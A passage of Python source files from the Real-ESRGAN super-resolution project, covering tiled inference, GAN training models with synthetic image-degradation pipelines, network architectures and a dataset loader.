output_start_x:output_end_x] = output_tile[:, :, output_start_y_tile:output_end_y_tile, output_start_x_tile:output_end_x_tile] def post_process(self): # remove extra pad if self.mod_scale is not None: _, _, h, w = self.output.size() self.output = self.output[:, :, 0:h - self.mod_pad_h * self.scale, 0:w - self.mod_pad_w * self.scale] # remove prepad if self.pre_pad != 0: _, _, h, w = self.output.size() self.output = self.output[:, :, 0:h - self.pre_pad * self.scale, 0:w - self.pre_pad * self.scale] return self.output @torch.no_grad() def enhance(self, img, outscale=None, alpha_upsampler='realesrgan'): h_input, w_input = img.shape[0:2] # img: numpy img = img.astype(np.float32) if np.max(img) > 256: # 16-bit image max_range = 65535 print('\tInput is a 16-bit image') else: max_range = 255 img = img / max_range if len(img.shape) == 2: # gray image img_mode = 'L' img = cv2.cvtColor(img, cv2.COLOR_GRAY2RGB) elif img.shape[2] == 4: # RGBA image with alpha channel img_mode = 'RGBA' alpha = img[:, :, 3] img = img[:, :, 0:3] img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) if alpha_upsampler == 'realesrgan': alpha = cv2.cvtColor(alpha, cv2.COLOR_GRAY2RGB) else: img_mode = 'RGB' img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) # ------------------- process image (without the alpha channel) ------------------- # self.pre_process(img) if self.tile_size > 0: self.tile_process() else: self.process() output_img = self.post_process() output_img = output_img.data.squeeze().float().cpu().clamp_(0, 1).numpy() output_img = np.transpose(output_img[[2, 1, 0], :, :], (1, 2, 0)) if img_mode == 'L': output_img = cv2.cvtColor(output_img, cv2.COLOR_BGR2GRAY) # ------------------- process the alpha channel if necessary ------------------- # if img_mode == 'RGBA': if alpha_upsampler == 'realesrgan': self.pre_process(alpha) if self.tile_size > 0: self.tile_process() else: self.process() output_alpha = self.post_process() output_alpha = output_alpha.data.squeeze().float().cpu().clamp_(0, 1).numpy() output_alpha = np.transpose(output_alpha[[2, 1, 0], :, :], (1, 2, 0)) output_alpha = cv2.cvtColor(output_alpha, cv2.COLOR_BGR2GRAY) else: # use the cv2 resize for alpha channel h, w = alpha.shape[0:2] output_alpha = cv2.resize(alpha, (w * self.scale, h * self.scale), interpolation=cv2.INTER_LINEAR) # merge the alpha channel output_img = cv2.cvtColor(output_img, cv2.COLOR_BGR2BGRA) output_img[:, :, 3] = output_alpha # ------------------------------ return ------------------------------ # if max_range == 65535: # 16-bit image output = (output_img * 65535.0).round().astype(np.uint16) else: output = (output_img * 255.0).round().astype(np.uint8) if outscale is not None and outscale != float(self.scale): output = cv2.resize( output, ( int(w_input * outscale), int(h_input * outscale), ), interpolation=cv2.INTER_LANCZOS4) return output, img_mode class PrefetchReader(threading.Thread): """Prefetch images. Args: img_list (list[str]): A image list of image paths to be read. num_prefetch_queue (int): Number of prefetch queue. """ def __init__(self, img_list, num_prefetch_queue): super().__init__() self.que = queue.Queue(num_prefetch_queue) self.img_list = img_list def run(self): for img_path in self.img_list: img = cv2.imread(img_path, cv2.IMREAD_UNCHANGED) self.que.put(img) self.que.put(None) def __next__(self): next_item = self.que.get() if next_item is None: raise StopIteration return next_item def __iter__(self): return self class IOConsumer(threading.Thread): def __init__(self, opt, que, qid): super().__init__() self._queue = que self.qid = qid self.opt = opt def run(self): while True: msg = self._queue.get() if isinstance(msg, str) and msg == 'quit': break output = msg['output'] save_path = msg['save_path'] cv2.imwrite(save_path, output) print(f'IO worker {self.qid} is done.') File: realesrgan/train.py # flake8: noqa import os.path as osp from basicsr.train import train_pipeline import realesrgan.archs import realesrgan.data import realesrgan.models if __name__ == '__main__': root_path = osp.abspath(osp.join(__file__, osp.pardir, osp.pardir)) train_pipeline(root_path) File: realesrgan/models/realesrnet_model.py import numpy as np import random import torch from basicsr.data.degradations import random_add_gaussian_noise_pt, random_add_poisson_noise_pt from basicsr.data.transforms import paired_random_crop from basicsr.models.sr_model import SRModel from basicsr.utils import DiffJPEG, USMSharp from basicsr.utils.img_process_util import filter2D from basicsr.utils.registry import MODEL_REGISTRY from torch.nn import functional as F @MODEL_REGISTRY.register() class RealESRNetModel(SRModel): """RealESRNet Model for Real-ESRGAN: Training Real-World Blind Super-Resolution with Pure Synthetic Data. It is trained without GAN losses. It mainly performs: 1. randomly synthesize LQ images in GPU tensors 2. optimize the networks with GAN training. """ def __init__(self, opt): super(RealESRNetModel, self).__init__(opt) self.jpeger = DiffJPEG(differentiable=False).cuda() # simulate JPEG compression artifacts self.usm_sharpener = USMSharp().cuda() # do usm sharpening self.queue_size = opt.get('queue_size', 180) @torch.no_grad() def _dequeue_and_enqueue(self): """It is the training pair pool for increasing the diversity in a batch. Batch processing limits the diversity of synthetic degradations in a batch. For example, samples in a batch could not have different resize scaling factors. Therefore, we employ this training pair pool to increase the degradation diversity in a batch. """ # initialize b, c, h, w = self.lq.size() if not hasattr(self, 'queue_lr'): assert self.queue_size % b == 0, f'queue size {self.queue_size} should be divisible by batch size {b}' self.queue_lr = torch.zeros(self.queue_size, c, h, w).cuda() _, c, h, w = self.gt.size() self.queue_gt = torch.zeros(self.queue_size, c, h, w).cuda() self.queue_ptr = 0 if self.queue_ptr == self.queue_size: # the pool is full # do dequeue and enqueue # shuffle idx = torch.randperm(self.queue_size) self.queue_lr = self.queue_lr[idx] self.queue_gt = self.queue_gt[idx] # get first b samples lq_dequeue = self.queue_lr[0:b, :, :, :].clone() gt_dequeue = self.queue_gt[0:b, :, :, :].clone() # update the queue self.queue_lr[0:b, :, :, :] = self.lq.clone() self.queue_gt[0:b, :, :, :] = self.gt.clone() self.lq = lq_dequeue self.gt = gt_dequeue else: # only do enqueue self.queue_lr[self.queue_ptr:self.queue_ptr + b, :, :, :] = self.lq.clone() self.queue_gt[self.queue_ptr:self.queue_ptr + b, :, :, :] = self.gt.clone() self.queue_ptr = self.queue_ptr + b @torch.no_grad() def feed_data(self, data): """Accept data from dataloader, and then add two-order degradations to obtain LQ images. """ if self.is_train and self.opt.get('high_order_degradation', True): # training data synthesis self.gt = data['gt'].to(self.device) # USM sharpen the GT images if self.opt['gt_usm'] is True: self.gt = self.usm_sharpener(self.gt) self.kernel1 = data['kernel1'].to(self.device) self.kernel2 = data['kernel2'].to(self.device) self.sinc_kernel = data['sinc_kernel'].to(self.device) ori_h, ori_w = self.gt.size()[2:4] # ----------------------- The first degradation process ----------------------- # # blur out = filter2D(self.gt, self.kernel1) # random resize updown_type = random.choices(['up', 'down', 'keep'], self.opt['resize_prob'])[0] if updown_type == 'up': scale = np.random.uniform(1, self.opt['resize_range'][1]) elif updown_type == 'down': scale = np.random.uniform(self.opt['resize_range'][0], 1) else: scale = 1 mode = random.choice(['area', 'bilinear', 'bicubic']) out = F.interpolate(out, scale_factor=scale, mode=mode) # add noise gray_noise_prob = self.opt['gray_noise_prob'] if np.random.uniform() < self.opt['gaussian_noise_prob']: out = random_add_gaussian_noise_pt( out, sigma_range=self.opt['noise_range'], clip=True, rounds=False, gray_prob=gray_noise_prob) else: out = random_add_poisson_noise_pt( out, scale_range=self.opt['poisson_scale_range'], gray_prob=gray_noise_prob, clip=True, rounds=False) # JPEG compression jpeg_p = out.new_zeros(out.size(0)).uniform_(*self.opt['jpeg_range']) out = torch.clamp(out, 0, 1) # clamp to [0, 1], otherwise JPEGer will result in unpleasant artifacts out = self.jpeger(out, quality=jpeg_p) # ----------------------- The second degradation process ----------------------- # # blur if np.random.uniform() < self.opt['second_blur_prob']: out = filter2D(out, self.kernel2) # random resize updown_type = random.choices(['up', 'down', 'keep'], self.opt['resize_prob2'])[0] if updown_type == 'up': scale = np.random.uniform(1, self.opt['resize_range2'][1]) elif updown_type == 'down': scale = np.random.uniform(self.opt['resize_range2'][0], 1) else: scale = 1 mode = random.choice(['area', 'bilinear', 'bicubic']) out = F.interpolate( out, size=(int(ori_h / self.opt['scale'] * scale), int(ori_w / self.opt['scale'] * scale)), mode=mode) # add noise gray_noise_prob = self.opt['gray_noise_prob2'] if np.random.uniform() < self.opt['gaussian_noise_prob2']: out = random_add_gaussian_noise_pt( out, sigma_range=self.opt['noise_range2'], clip=True, rounds=False, gray_prob=gray_noise_prob) else: out = random_add_poisson_noise_pt( out, scale_range=self.opt['poisson_scale_range2'], gray_prob=gray_noise_prob, clip=True, rounds=False) # JPEG compression + the final sinc filter # We also need to resize images to desired sizes. We group [resize back + sinc filter] together # as one operation. # We consider two orders: # 1. [resize back + sinc filter] + JPEG compression # 2. JPEG compression + [resize back + sinc filter] # Empirically, we find other combinations (sinc + JPEG + Resize) will introduce twisted lines. if np.random.uniform() < 0.5: # resize back + the final sinc filter mode = random.choice(['area', 'bilinear', 'bicubic']) out = F.interpolate(out, size=(ori_h // self.opt['scale'], ori_w // self.opt['scale']), mode=mode) out = filter2D(out, self.sinc_kernel) # JPEG compression jpeg_p = out.new_zeros(out.size(0)).uniform_(*self.opt['jpeg_range2']) out = torch.clamp(out, 0, 1) out = self.jpeger(out, quality=jpeg_p) else: # JPEG compression jpeg_p = out.new_zeros(out.size(0)).uniform_(*self.opt['jpeg_range2']) out = torch.clamp(out, 0, 1) out = self.jpeger(out, quality=jpeg_p) # resize back + the final sinc filter mode = random.choice(['area', 'bilinear', 'bicubic']) out = F.interpolate(out, size=(ori_h // self.opt['scale'], ori_w // self.opt['scale']), mode=mode) out = filter2D(out, self.sinc_kernel) # clamp and round self.lq = torch.clamp((out * 255.0).round(), 0, 255) / 255. # random crop gt_size = self.opt['gt_size'] self.gt, self.lq = paired_random_crop(self.gt, self.lq, gt_size, self.opt['scale']) # training pair pool self._dequeue_and_enqueue() self.lq = self.lq.contiguous() # for the warning: grad and param do not obey the gradient layout contract else: # for paired training or validation self.lq = data['lq'].to(self.device) if 'gt' in data: self.gt = data['gt'].to(self.device) self.gt_usm = self.usm_sharpener(self.gt) def nondist_validation(self, dataloader, current_iter, tb_logger, save_img): # do not use the synthetic process during validation self.is_train = False super(RealESRNetModel, self).nondist_validation(dataloader, current_iter, tb_logger, save_img) self.is_train = True File: realesrgan/models/__init__.py import importlib from basicsr.utils import scandir from os import path as osp # automatically scan and import model modules for registry # scan all the files that end with '_model.py' under the model folder model_folder = osp.dirname(osp.abspath(__file__)) model_filenames = [osp.splitext(osp.basename(v))[0] for v in scandir(model_folder) if v.endswith('_model.py')] # import all the model modules _model_modules = [importlib.import_module(f'realesrgan.models.{file_name}') for file_name in model_filenames] File: realesrgan/models/realesrgan_model.py import numpy as np import random import torch from basicsr.data.degradations import random_add_gaussian_noise_pt, random_add_poisson_noise_pt from basicsr.data.transforms import paired_random_crop from basicsr.models.srgan_model import SRGANModel from basicsr.utils import DiffJPEG, USMSharp from basicsr.utils.img_process_util import filter2D from basicsr.utils.registry import MODEL_REGISTRY from collections import OrderedDict from torch.nn import functional as F @MODEL_REGISTRY.register() class RealESRGANModel(SRGANModel): """RealESRGAN Model for Real-ESRGAN: Training Real-World Blind Super-Resolution with Pure Synthetic Data. It mainly performs: 1. randomly synthesize LQ images in GPU tensors 2. optimize the networks with GAN training. """ def __init__(self, opt): super(RealESRGANModel, self).__init__(opt) self.jpeger = DiffJPEG(differentiable=False).cuda() # simulate JPEG compression artifacts self.usm_sharpener = USMSharp().cuda() # do usm sharpening self.queue_size = opt.get('queue_size', 180) @torch.no_grad() def _dequeue_and_enqueue(self): """It is the training pair pool for increasing the diversity in a batch. Batch processing limits the diversity of synthetic degradations in a batch. For example, samples in a batch could not have different resize scaling factors. Therefore, we employ this training pair pool to increase the degradation diversity in a batch. """ # initialize b, c, h, w = self.lq.size() if not hasattr(self, 'queue_lr'): assert self.queue_size % b == 0, f'queue size {self.queue_size} should be divisible by batch size {b}' self.queue_lr = torch.zeros(self.queue_size, c, h, w).cuda() _, c, h, w = self.gt.size() self.queue_gt = torch.zeros(self.queue_size, c, h, w).cuda() self.queue_ptr = 0 if self.queue_ptr == self.queue_size: # the pool is full # do dequeue and enqueue # shuffle idx = torch.randperm(self.queue_size) self.queue_lr = self.queue_lr[idx] self.queue_gt = self.queue_gt[idx] # get first b samples lq_dequeue = self.queue_lr[0:b, :, :, :].clone() gt_dequeue = self.queue_gt[0:b, :, :, :].clone() # update the queue self.queue_lr[0:b, :, :, :] = self.lq.clone() self.queue_gt[0:b, :, :, :] = self.gt.clone() self.lq = lq_dequeue self.gt = gt_dequeue else: # only do enqueue self.queue_lr[self.queue_ptr:self.queue_ptr + b, :, :, :] = self.lq.clone() self.queue_gt[self.queue_ptr:self.queue_ptr + b, :, :, :] = self.gt.clone() self.queue_ptr = self.queue_ptr + b @torch.no_grad() def feed_data(self, data): """Accept data from dataloader, and then add two-order degradations to obtain LQ images. """ if self.is_train and self.opt.get('high_order_degradation', True): # training data synthesis self.gt = data['gt'].to(self.device) self.gt_usm = self.usm_sharpener(self.gt) self.kernel1 = data['kernel1'].to(self.device) self.kernel2 = data['kernel2'].to(self.device) self.sinc_kernel = data['sinc_kernel'].to(self.device) ori_h, ori_w = self.gt.size()[2:4] # ----------------------- The first degradation process ----------------------- # # blur out = filter2D(self.gt_usm, self.kernel1) # random resize updown_type = random.choices(['up', 'down', 'keep'], self.opt['resize_prob'])[0] if updown_type == 'up': scale = np.random.uniform(1, self.opt['resize_range'][1]) elif updown_type == 'down': scale = np.random.uniform(self.opt['resize_range'][0], 1) else: scale = 1 mode = random.choice(['area', 'bilinear', 'bicubic']) out = F.interpolate(out, scale_factor=scale, mode=mode) # add noise gray_noise_prob = self.opt['gray_noise_prob'] if np.random.uniform() < self.opt['gaussian_noise_prob']: out = random_add_gaussian_noise_pt( out, sigma_range=self.opt['noise_range'], clip=True, rounds=False, gray_prob=gray_noise_prob) else: out = random_add_poisson_noise_pt( out, scale_range=self.opt['poisson_scale_range'], gray_prob=gray_noise_prob, clip=True, rounds=False) # JPEG compression jpeg_p = out.new_zeros(out.size(0)).uniform_(*self.opt['jpeg_range']) out = torch.clamp(out, 0, 1) # clamp to [0, 1], otherwise JPEGer will result in unpleasant artifacts out = self.jpeger(out, quality=jpeg_p) # ----------------------- The second degradation process ----------------------- # # blur if np.random.uniform() < self.opt['second_blur_prob']: out = filter2D(out, self.kernel2) # random resize updown_type = random.choices(['up', 'down', 'keep'], self.opt['resize_prob2'])[0] if updown_type == 'up': scale = np.random.uniform(1, self.opt['resize_range2'][1]) elif updown_type == 'down': scale = np.random.uniform(self.opt['resize_range2'][0], 1) else: scale = 1 mode = random.choice(['area', 'bilinear', 'bicubic']) out = F.interpolate( out, size=(int(ori_h / self.opt['scale'] * scale), int(ori_w / self.opt['scale'] * scale)), mode=mode) # add noise gray_noise_prob = self.opt['gray_noise_prob2'] if np.random.uniform() < self.opt['gaussian_noise_prob2']: out = random_add_gaussian_noise_pt( out, sigma_range=self.opt['noise_range2'], clip=True, rounds=False, gray_prob=gray_noise_prob) else: out = random_add_poisson_noise_pt( out, scale_range=self.opt['poisson_scale_range2'], gray_prob=gray_noise_prob, clip=True, rounds=False) # JPEG compression + the final sinc filter # We also need to resize images to desired sizes. We group [resize back + sinc filter] together # as one operation. # We consider two orders: # 1. [resize back + sinc filter] + JPEG compression # 2. JPEG compression + [resize back + sinc filter] # Empirically, we find other combinations (sinc + JPEG + Resize) will introduce twisted lines. if np.random.uniform() < 0.5: # resize back + the final sinc filter mode = random.choice(['area', 'bilinear', 'bicubic']) out = F.interpolate(out, size=(ori_h // self.opt['scale'], ori_w // self.opt['scale']), mode=mode) out = filter2D(out, self.sinc_kernel) # JPEG compression jpeg_p = out.new_zeros(out.size(0)).uniform_(*self.opt['jpeg_range2']) out = torch.clamp(out, 0, 1) out = self.jpeger(out, quality=jpeg_p) else: # JPEG compression jpeg_p = out.new_zeros(out.size(0)).uniform_(*self.opt['jpeg_range2']) out = torch.clamp(out, 0, 1) out = self.jpeger(out, quality=jpeg_p) # resize back + the final sinc filter mode = random.choice(['area', 'bilinear', 'bicubic']) out = F.interpolate(out, size=(ori_h // self.opt['scale'], ori_w // self.opt['scale']), mode=mode) out = filter2D(out, self.sinc_kernel) # clamp and round self.lq = torch.clamp((out * 255.0).round(), 0, 255) / 255. # random crop gt_size = self.opt['gt_size'] (self.gt, self.gt_usm), self.lq = paired_random_crop([self.gt, self.gt_usm], self.lq, gt_size, self.opt['scale']) # training pair pool self._dequeue_and_enqueue() # sharpen self.gt again, as we have changed the self.gt with self._dequeue_and_enqueue self.gt_usm = self.usm_sharpener(self.gt) self.lq = self.lq.contiguous() # for the warning: grad and param do not obey the gradient layout contract else: # for paired training or validation self.lq = data['lq'].to(self.device) if 'gt' in data: self.gt = data['gt'].to(self.device) self.gt_usm = self.usm_sharpener(self.gt) def nondist_validation(self, dataloader, current_iter, tb_logger, save_img): # do not use the synthetic process during validation self.is_train = False super(RealESRGANModel, self).nondist_validation(dataloader, current_iter, tb_logger, save_img) self.is_train = True def optimize_parameters(self, current_iter): # usm sharpening l1_gt = self.gt_usm percep_gt = self.gt_usm gan_gt = self.gt_usm if self.opt['l1_gt_usm'] is False: l1_gt = self.gt if self.opt['percep_gt_usm'] is False: percep_gt = self.gt if self.opt['gan_gt_usm'] is False: gan_gt = self.gt # optimize net_g for p in self.net_d.parameters(): p.requires_grad = False self.optimizer_g.zero_grad() self.output = self.net_g(self.lq) l_g_total = 0 loss_dict = OrderedDict() if (current_iter % self.net_d_iters == 0 and current_iter > self.net_d_init_iters): # pixel loss if self.cri_pix: l_g_pix = self.cri_pix(self.output, l1_gt) l_g_total += l_g_pix loss_dict['l_g_pix'] = l_g_pix # perceptual loss if self.cri_perceptual: l_g_percep, l_g_style = self.cri_perceptual(self.output, percep_gt) if l_g_percep is not None: l_g_total += l_g_percep loss_dict['l_g_percep'] = l_g_percep if l_g_style is not None: l_g_total += l_g_style loss_dict['l_g_style'] = l_g_style # gan loss fake_g_pred = self.net_d(self.output) l_g_gan = self.cri_gan(fake_g_pred, True, is_disc=False) l_g_total += l_g_gan loss_dict['l_g_gan'] = l_g_gan l_g_total.backward() self.optimizer_g.step() # optimize net_d for p in self.net_d.parameters(): p.requires_grad = True self.optimizer_d.zero_grad() # real real_d_pred = self.net_d(gan_gt) l_d_real = self.cri_gan(real_d_pred, True, is_disc=True) loss_dict['l_d_real'] = l_d_real loss_dict['out_d_real'] = torch.mean(real_d_pred.detach()) l_d_real.backward() # fake fake_d_pred = self.net_d(self.output.detach().clone()) # clone for pt1.9 l_d_fake = self.cri_gan(fake_d_pred, False, is_disc=True) loss_dict['l_d_fake'] = l_d_fake loss_dict['out_d_fake'] = torch.mean(fake_d_pred.detach()) l_d_fake.backward() self.optimizer_d.step() if self.ema_decay > 0: self.model_ema(decay=self.ema_decay) self.log_dict = self.reduce_loss_dict(loss_dict) File: realesrgan/archs/discriminator_arch.py from basicsr.utils.registry import ARCH_REGISTRY from torch import nn as nn from torch.nn import functional as F from torch.nn.utils import spectral_norm @ARCH_REGISTRY.register() class UNetDiscriminatorSN(nn.Module): """Defines a U-Net discriminator with spectral normalization (SN) It is used in Real-ESRGAN: Training Real-World Blind Super-Resolution with Pure Synthetic Data. Arg: num_in_ch (int): Channel number of inputs. Default: 3. num_feat (int): Channel number of base intermediate features. Default: 64. skip_connection (bool): Whether to use skip connections between U-Net. Default: True. """ def __init__(self, num_in_ch, num_feat=64, skip_connection=True): super(UNetDiscriminatorSN, self).__init__() self.skip_connection = skip_connection norm = spectral_norm # the first convolution self.conv0 = nn.Conv2d(num_in_ch, num_feat, kernel_size=3, stride=1, padding=1) # downsample self.conv1 = norm(nn.Conv2d(num_feat, num_feat * 2, 4, 2, 1, bias=False)) self.conv2 = norm(nn.Conv2d(num_feat * 2, num_feat * 4, 4, 2, 1, bias=False)) self.conv3 = norm(nn.Conv2d(num_feat * 4, num_feat * 8, 4, 2, 1, bias=False)) # upsample self.conv4 = norm(nn.Conv2d(num_feat * 8, num_feat * 4, 3, 1, 1, bias=False)) self.conv5 = norm(nn.Conv2d(num_feat * 4, num_feat * 2, 3, 1, 1, bias=False)) self.conv6 = norm(nn.Conv2d(num_feat * 2, num_feat, 3, 1, 1, bias=False)) # extra convolutions self.conv7 = norm(nn.Conv2d(num_feat, num_feat, 3, 1, 1, bias=False)) self.conv8 = norm(nn.Conv2d(num_feat, num_feat, 3, 1, 1, bias=False)) self.conv9 = nn.Conv2d(num_feat, 1, 3, 1, 1) def forward(self, x): # downsample x0 = F.leaky_relu(self.conv0(x), negative_slope=0.2, inplace=True) x1 = F.leaky_relu(self.conv1(x0), negative_slope=0.2, inplace=True) x2 = F.leaky_relu(self.conv2(x1), negative_slope=0.2, inplace=True) x3 = F.leaky_relu(self.conv3(x2), negative_slope=0.2, inplace=True) # upsample x3 = F.interpolate(x3, scale_factor=2, mode='bilinear', align_corners=False) x4 = F.leaky_relu(self.conv4(x3), negative_slope=0.2, inplace=True) if self.skip_connection: x4 = x4 + x2 x4 = F.interpolate(x4, scale_factor=2, mode='bilinear', align_corners=False) x5 = F.leaky_relu(self.conv5(x4), negative_slope=0.2, inplace=True) if self.skip_connection: x5 = x5 + x1 x5 = F.interpolate(x5, scale_factor=2, mode='bilinear', align_corners=False) x6 = F.leaky_relu(self.conv6(x5), negative_slope=0.2, inplace=True) if self.skip_connection: x6 = x6 + x0 # extra convolutions out = F.leaky_relu(self.conv7(x6), negative_slope=0.2, inplace=True) out = F.leaky_relu(self.conv8(out), negative_slope=0.2, inplace=True) out = self.conv9(out) return out File: realesrgan/archs/__init__.py import importlib from basicsr.utils import scandir from os import path as osp # automatically scan and import arch modules for registry # scan all the files that end with '_arch.py' under the archs folder arch_folder = osp.dirname(osp.abspath(__file__)) arch_filenames = [osp.splitext(osp.basename(v))[0] for v in scandir(arch_folder) if v.endswith('_arch.py')] # import all the arch modules _arch_modules = [importlib.import_module(f'realesrgan.archs.{file_name}') for file_name in arch_filenames] File: realesrgan/archs/srvgg_arch.py from basicsr.utils.registry import ARCH_REGISTRY from torch import nn as nn from torch.nn import functional as F @ARCH_REGISTRY.register() class SRVGGNetCompact(nn.Module): """A compact VGG-style network structure for super-resolution. It is a compact network structure, which performs upsampling in the last layer and no convolution is conducted on the HR feature space. Args: num_in_ch (int): Channel number of inputs. Default: 3. num_out_ch (int): Channel number of outputs. Default: 3. num_feat (int): Channel number of intermediate features. Default: 64. num_conv (int): Number of convolution layers in the body network. Default: 16. upscale (int): Upsampling factor. Default: 4. act_type (str): Activation type, options: 'relu', 'prelu', 'leakyrelu'. Default: prelu. """ def __init__(self, num_in_ch=3, num_out_ch=3, num_feat=64, num_conv=16, upscale=4, act_type='prelu'): super(SRVGGNetCompact, self).__init__() self.num_in_ch = num_in_ch self.num_out_ch = num_out_ch self.num_feat = num_feat self.num_conv = num_conv self.upscale = upscale self.act_type = act_type self.body = nn.ModuleList() # the first conv self.body.append(nn.Conv2d(num_in_ch, num_feat, 3, 1, 1)) # the first activation if act_type == 'relu': activation = nn.ReLU(inplace=True) elif act_type == 'prelu': activation = nn.PReLU(num_parameters=num_feat) elif act_type == 'leakyrelu': activation = nn.LeakyReLU(negative_slope=0.1, inplace=True) self.body.append(activation) # the body structure for _ in range(num_conv): self.body.append(nn.Conv2d(num_feat, num_feat, 3, 1, 1)) # activation if act_type == 'relu': activation = nn.ReLU(inplace=True) elif act_type == 'prelu': activation = nn.PReLU(num_parameters=num_feat) elif act_type == 'leakyrelu': activation = nn.LeakyReLU(negative_slope=0.1, inplace=True) self.body.append(activation) # the last conv self.body.append(nn.Conv2d(num_feat, num_out_ch * upscale * upscale, 3, 1, 1)) # upsample self.upsampler = nn.PixelShuffle(upscale) def forward(self, x): out = x for i in range(0, len(self.body)): out = self.body[i](out) out = self.upsampler(out) # add the nearest upsampled image, so that the network learns the residual base = F.interpolate(x, scale_factor=self.upscale, mode='nearest') out += base return out File: realesrgan/data/__init__.py import importlib from basicsr.utils import scandir from os import path as osp # automatically scan and import dataset modules for registry # scan all the files that end with '_dataset.py' under the data folder data_folder = osp.dirname(osp.abspath(__file__)) dataset_filenames = [osp.splitext(osp.basename(v))[0] for v in scandir(data_folder) if v.endswith('_dataset.py')] # import all the dataset modules _dataset_modules = [importlib.import_module(f'realesrgan.data.{file_name}') for file_name in dataset_filenames] File: realesrgan/data/realesrgan_dataset.py import cv2 import math import numpy as np import os import os.path as osp import random import time import torch from basicsr.data.degradations import circular_lowpass_kernel, random_mixed_kernels from basicsr.data.transforms import augment from basicsr.utils import FileClient, get_root_logger, imfrombytes, img2tensor from basicsr.utils.registry import DATASET_REGISTRY from torch.utils import data as data @DATASET_REGISTRY.register() class RealESRGANDataset(data.Dataset): """Dataset used for Real-ESRGAN model: Real-ESRGAN: Training Real-World Blind Super-Resolution with Pure Synthetic Data. It loads gt (Ground-Truth) images, and augments them. It also generates blur kernels and sinc kernels for generating low-quality images. Note that the low-quality images are processed in tensors on GPUS for faster processing. Args: opt (dict): Config for train datasets. It contains the following keys: dataroot_gt (str): Data root path for gt. meta_info (str): Path for meta information file. io_backend (dict): IO backend type and other kwarg. use_hflip (bool): Use horizontal flips. use_rot (bool): Use rotation (use vertical flip and transposing h and w for implementation). Please see more options in the codes. """ def __init__(self, opt): super(RealESRGANDataset, self).__init__() self.opt = opt self.file_client = None self.io_backend_opt = opt['io_backend'] self.gt_folder = opt['dataroot_gt'] # file client (lmdb io backend) if self.io_backend_opt['type'] == 'lmdb': self.io_backend_opt['db_paths'] = [self.gt_folder] self.io_backend_opt['client_keys'] = ['gt'] if not self.gt_folder.endswith('.lmdb'): raise ValueError(f"'dataroot_gt' should end with '.lmdb', but received {self.gt_folder}") with open(osp.join(self.gt_folder, 'meta_info.txt')) as fin: self.paths = [line.split('.')[0] for line in fin] else: # disk backend with meta_info # Each line in the meta_info describes the relative path to an image with open(self.opt['meta_info']) as fin: paths = [line.strip().split(' ')[0] for line in fin] self.paths = [os.path.join(self.gt_folder, v) for v in paths] # blur settings for the first degradation self.blur_kernel_size = opt['blur_kernel_size'] self.kernel_list = opt['kernel_list'] self.kernel_prob = opt['kernel_prob'] # a list for each kernel probability self.blur_sigma = opt['blur_sigma'] self.betag_range = opt['betag_range'] # betag used in generalized Gaussian blur kernels self.betap_range = opt['betap_range'] # betap used in plateau blur kernels self.sinc_prob = opt['sinc_prob'] # the probability for sinc filters # blur settings for the second degradation self.blur_kernel_size2 = opt['blur_kernel_size2'] self.kernel_list2 = opt['kernel_list2'] self.kernel_prob2 = opt['kernel_prob2'] self.blur_sigma2 = opt['blur_sigma2'] self.betag_range2 = opt['betag_range2'] self.betap_range2 = opt['betap_range2'] self.sinc_prob2 = opt['sinc_prob2'] # a final sinc filter self.final_sinc_prob = opt['final_sinc_prob'] self.kernel_range = [2 * v + 1 for v in range(3, 11)] # kernel size ranges from 7 to 21 # TODO: kernel range is now hard-coded, should be in the configure file self.pulse_tensor = torch.zeros(21, 21).float() # convolving with pulse tensor brings no blurry effect self.pulse_tensor[10, 10] = 1 def __getitem__(self, index): if self.file_client is None: self.file_client = FileClient(self.io_backend_opt.pop('type'), **self.io_backend_opt) # -------------------------------- Load gt images -------------------------------- # # Shape: (h, w, c); channel order: BGR; image range: [0, 1], float32. gt_path = self.paths[index] # avoid errors caused by high latency in reading files retry = 3 while retry > 0: try: img_bytes = self.file_client.get(gt_path, 'gt') except (IOError, OSError) as e: logger = get_root_logger() logger.warn(f'File client error: {e}, remaining retry times: {retry - 1}') # change another file to read index = random.randint(0, self.__len__()) gt_path = self.paths[index] time.sleep(1) # sleep 1s for occasional server congestion else: break finally: retry -= 1 img_gt = imfrombytes(img_bytes, float32=True) # -------------------- Do augmentation for training: flip, rotation -------------------- # img_gt = augment(img_gt, self.opt['use_hflip'], self.opt['use_rot']) # crop or pad to 400 # TODO: 400 is hard-coded. You may change it accordingly h, w = img_gt.shape[0:2] crop_pad_size = 400 # pad if h < crop_pad_size or w < crop_pad_size: pad_h = max(0, crop_pad_size - h) pad_w = max(0, crop_pad_size - w) img_gt = cv2.copyMakeBorder(img_gt, 0, pad_h, 0, pad_w, cv2.BORDER_REFLECT_101) # crop if img_gt.shape[0] > crop_pad_size or img_gt.shape[1] > crop_pad_size: h, w = img_gt.shape[0:2] # randomly choose top and left coordinates top = random.randint(0, h - crop_pad_size) left = random.randint(0, w - crop_pad_size) img_gt = img_gt[top:top + crop_pad_size, left:left + crop_pad_size, ...] # ------------------------ Generate kernels (used in the first degradation) ------------------------ # kernel_size = random.choice(self.kernel_range) if np.random.uniform() < self.opt['sinc_prob']: # this sinc filter setting is for kernels ranging from [7, 21] if kernel_size < 13: omega_c = np.random.uniform(np.pi / 3, np.pi) else: omega_c = np.random.uniform(np.pi / 5, np.pi) kernel = circular_lowpass_kernel(omega_c, kernel_size, pad_to=False) else: kernel = random_mixed_kernels( self.kernel_list, self.kernel_prob, kernel_size, self.blur_sigma, self.blur_sigma, [-math.pi, math.pi], self.betag_range, self.betap_range, noise_range=None) # pad kernel pad_size = (21 - kernel_size) // 2 kernel = np.pad(kernel, ((pad_size, pad_size), (pad_size, pad_size))) # ------------------------ Generate kernels (used in the second degradation) ------------------------ # kernel_size = random.choice(self.kernel_range) if np.random.uniform() < self.opt['sinc_prob2']: if kernel_size < 13: omega_c = np.random.uniform(np.pi / 3, np.pi) else: omega_c = np.random.uniform(np.pi / 5, np.pi) kernel2 = circular_lowpass_kernel(omega_c, kernel_size, pad_to=False) else: kernel2 = random_mixed_kernels( self.kernel_list2, self.kernel_prob2, kernel_size, self.blur_sigma2, self.blur_sigma2, [-math.pi, math.pi], self.betag_range2, self.betap_range2, noise_range=None) # pad kernel pad_size = (21 - kernel_size) // 2 kernel2 = np.pad(kernel2, ((pad_size, pad_size), (pad_size, pad_size))) # ------------------------------------- the final sinc kernel ------------------------------------- # if np.random.uniform() < self.opt['final_sinc_prob']: kernel_size = random.choice(self.kernel_range) omega_c = np.random.uniform(np.pi / 3, np.pi) sinc_kernel = 